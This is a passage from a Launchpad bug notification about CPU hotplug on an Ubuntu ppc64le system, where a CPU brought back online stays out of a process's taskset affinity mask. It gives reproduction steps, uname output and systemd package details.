  Hence please revert this feature or provide an explaination as to why this is 
being done.
   
  ---uname output---
  Linux tul181p1 3.16.0-18-generic #25-Ubuntu SMP Fri Sep 26 02:39:53 UTC 2014 
ppc64le ppc64le ppc64le GNU/Linux
   
  Machine Type = Tuleta 8286-42A 
   ---Debugger---
  A debugger was configured, however the system did not enter into the debugger
   
  ---Steps to Reproduce---
   $ taskset -p $$
  $ 0-127
  $ echo 0 > /sys/devices/system/cpu/cpu7/online
  $ taskset -p $$
  $ 0-6,8-127
  $ echo 1 > /sys/devices/system/cpu/cpu7/online
  $ taskset -p $$
  $ 0-6,8-127
   
   
  Userspace tool common name: systemd 
   
  The userspace tool has the following bit modes: 64-bit 

  Userspace rpm: systemd_208-8ubuntu8_ppc64el.deb

  Userspace tool obtained from project website:   208-8ubuntu8

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1392176/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp